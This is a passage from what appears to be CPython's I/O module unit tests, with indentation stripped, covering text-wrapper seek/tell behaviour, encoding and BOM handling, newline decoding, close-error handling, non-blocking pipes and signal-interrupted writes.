f._CHUNK_SIZE = chunksize
self.assertEqual(f.write('abc'), 3)
f.close()
f = self.open(support.TESTFN, 'r+', encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), 'abc')
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), 'abc')
f.seek(0)
self.assertEqual(f.read(2), 'ab')
self.assertEqual(f.read(1), 'c')
self.assertEqual(f.read(1), '')
self.assertEqual(f.read(), '')
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write('def'), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), 'def')
if enc.startswith('utf'):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = 'sÿ\u0fff\uffff'
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = ''.join(chars) + '\n'
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, 'w+', encoding='utf-8')
p0 = f.tell()
f.write('ÿ\n')
p1 = f.tell()
f.write('ÿ\n')
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), 'ÿ\n')
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), 'ÿ\n')
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, 'ÿ\n')
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = 'a' * prefix_size
prefix = bytes(u_prefix.encode('utf-8'))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = '袈\n'
suffix = bytes(u_suffix.encode('utf-8'))
line = prefix + suffix
with self.open(support.TESTFN, 'wb') as f:
f.write(line * 2)
with self.open(support.TESTFN, 'r', encoding='utf-8') as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, 'ascii'))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, 'wb') as f:
f.write(data)
with self.open(support.TESTFN, 'r', encoding='utf-8') as f:
f._CHUNK_SIZE
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1):
for j in [1, 5, len(decoded) - i]:
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
StatefulIncrementalDecoder.codecEnabled = 1
try:
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input) // 2
prefix = b'.' * offset
min_pos = offset * 2
test_seek_and_tell_with_data(prefix + input, min_pos)
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = '1234567890'
tests = ('utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le',
'utf-32-be')
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b'AA\r\nBB'))
reads = ''
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, 'AA\nBB')
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b'AA\nBB\nCC'))
self.assertEqual(txt.readlines(), ['AA\n', 'BB\n', 'CC'])
txt.seek(0)
self.assertEqual(txt.readlines(None), ['AA\n', 'BB\n', 'CC'])
txt.seek(0)
self.assertEqual(txt.readlines(5), ['AA\n', 'BB\n'])
def test_read_by_chunk(self):
txt = self.TextIOWrapper(self.BytesIO(b'A' * 127 + b'\r\nB'))
reads = ''
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, 'A' * 127 + '\nB')
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
reads = ''
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
txt._CHUNK_SIZE = 4
reads = ''
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), 'BBB\n')
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding='ascii')
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, 'w') as f:
self.assertEqual(f.errors, 'strict')
with self.open(support.TESTFN, 'w', errors='replace') as f:
self.assertEqual(f.errors, 'replace')
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
event = threading.Event()
with self.open(support.TESTFN, 'w', buffering=1) as f:
def run(n):
text = 'Thread%03d\n' % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,)) for x in
range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count('Thread%03d\n' % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close)
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed)
self.assertFalse(closed[0])
self.assertFalse(closed[1])
txt.flush = lambda : None
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding='ascii')
txt.flush = bad_flush
with self.assertRaises(OSError) as err:
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding='ascii')
txt.flush = bad_flush
with self.assertRaises(NameError) as err:
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b'a'
bufio = BufferedWriter(rawio, len(data) * 2)
textio = self.TextIOWrapper(bufio, encoding='ascii', write_through=True
)
text = data.decode('ascii')
textio.write(text)
self.assertFalse(flush_called)
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b'')
write_called = []
textio.write(text * 10)
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11)
def test_read_nonbytes(self):
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
def _make_illegal_wrapper():
quopri = codecs.lookup('quopri')
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline=
'\n', encoding='quopri')
finally:
quopri._is_text_encoding = False
return t
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
iomod = self.io.__name__
code = (
"""if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
"""
.format(iomod=iomod, kwargs=kwargs))
return assert_python_ok('-c', code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual('ok', out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual('ok', out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self):
return True
def writable(self):
return True
def seekable(self):
return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
"""A BytesIO object whose read method returns memoryviews
rather than bytes"""
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
"""Convert bytes-object *buf* to a non-trivial memoryview"""
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = 'RuntimeError: could not find io module state'
def test_initialization(self):
r = self.BytesIO(b'\xc3\xa9\n\n')
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, 'wb')
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding='ascii')
t.write('456def')
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.read(), b'456def')
def test_rwpair_cleared_before_textio(self):
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding='ascii')
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding='ascii')
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = 'LookupError: unknown encoding: ascii'
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
def _check_decode(b, s, **kwargs):
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', '袈')
_check_decode(b'\xe8', '')
_check_decode(b'\xa2', '')
_check_decode(b'\x88', '袈')
_check_decode(b'\xe8', '')
_check_decode(b'\xa2', '')
_check_decode(b'\x88', '袈')
_check_decode(b'\xe8', '')
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', '\n')
_check_decode(b'\r', '')
_check_decode(b'', '\n', final=True)
_check_decode(b'\r', '\n', final=True)
_check_decode(b'\r', '')
_check_decode(b'a', '\na')
_check_decode(b'\r\r\n', '\n\n')
_check_decode(b'\r', '')
_check_decode(b'\r', '\n')
_check_decode(b'\na', '\na')
_check_decode(b'\xe8\xa2\x88\r\n', '袈\n')
_check_decode(b'\xe8\xa2\x88', '袈')
_check_decode(b'\n', '\n')
_check_decode(b'\xe8\xa2\x88\r', '袈')
_check_decode(b'\n', '\n')
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise('abc\n\r')
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise('\nabc')
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise('abc\r')
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise('abc')
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise('abc\r')
self.assertEqual(''.join(result), 'abc\n\nabcabc\nabcabc')
decoder.reset()
input = 'abc'
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), 'abc')
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (None, 'utf-8', 'latin-1', 'utf-16', 'utf-16-le',
'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be')
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder('utf-8')()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode('\u0d00'), '\u0d00')
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode('\u0a00'), '\u0a00')
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == 'open':
continue
elif 'error' in name.lower() or name == 'UnsupportedOperation':
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith('SEEK_'):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, 'wb', buffering=0)
self.assertEqual(f.mode, 'wb')
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, 'U')
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, 'U')
self.assertEqual(f.buffer.mode, 'rb')
self.assertEqual(f.buffer.raw.mode, 'rb')
f.close()
f = self.open(support.TESTFN, 'w+')
self.assertEqual(f.mode, 'w+')
self.assertEqual(f.buffer.mode, 'rb+')
self.assertEqual(f.buffer.raw.mode, 'rb+')
g = self.open(f.fileno(), 'wb', closefd=False)
self.assertEqual(g.mode, 'wb')
self.assertEqual(g.raw.mode, 'wb')
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [{'mode': 'w'}, {'mode': 'wb'}, {'mode': 'w',
'buffering': 1}, {'mode': 'w', 'buffering': 2}, {'mode': 'wb',
'buffering': 0}, {'mode': 'r'}, {'mode': 'rb'}, {'mode': 'r',
'buffering': 1}, {'mode': 'r', 'buffering': 2}, {'mode': 'rb',
'buffering': 0}, {'mode': 'w+'}, {'mode': 'w+b'}, {'mode': 'w+',
'buffering': 1}, {'mode': 'w+', 'buffering': 2}, {'mode': 'w+b',
'buffering': 0}]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, 'peek'):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, 'read1'):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, 'readall'):
self.assertRaises(ValueError, f.readall)
if hasattr(f, 'readinto'):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, 'readinto1'):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write, b'' if 'b' in kwargs[
'mode'] else '')
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
class C(str):
pass
c = C('')
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, 'wb', buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, 'wb') as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, 'w') as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, 'wb', buffering=0)
self._check_warn_on_dealloc(support.TESTFN, 'wb')
self._check_warn_on_dealloc(support.TESTFN, 'w')
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd('rb', buffering=0)
self._check_warn_on_dealloc_fd('rb')
self._check_warn_on_dealloc_fd('r')
def test_pickling(self):
for kwargs in [{'mode': 'w'}, {'mode': 'wb'}, {'mode': 'wb',
'buffering': 0}, {'mode': 'r'}, {'mode': 'rb'}, {'mode': 'rb',
'buffering': 0}, {'mode': 'w+'}, {'mode': 'w+b'}, {'mode':
'w+b', 'buffering': 0}]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16 * 1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in (9999, 73, 7574):
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
with self.open(support.TESTFN, 'xb') as f:
f.write(b'spam')
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b'spam', f.read())
def test_open_allargs(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10 ** 6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
code = (
"""if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
"""
.format_map(locals()))
res, _ = run_python_until_end('-c', code)
err = res.err.decode()
if res.rc != 0:
self.assertIn(
"Fatal Python error: could not acquire lock for <_io.BufferedWriter name='<{stream_name}>'> at interpreter shutdown, possibly due to daemon threads"
.format_map(locals()), err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 / 0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs['closefd'] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b'xy', b'xy', mode='wb', buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b'xy', b'xy', mode='wb')
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write('xy', b'xy', mode='w', encoding='ascii')
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
wio.write(data)
1 / 0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
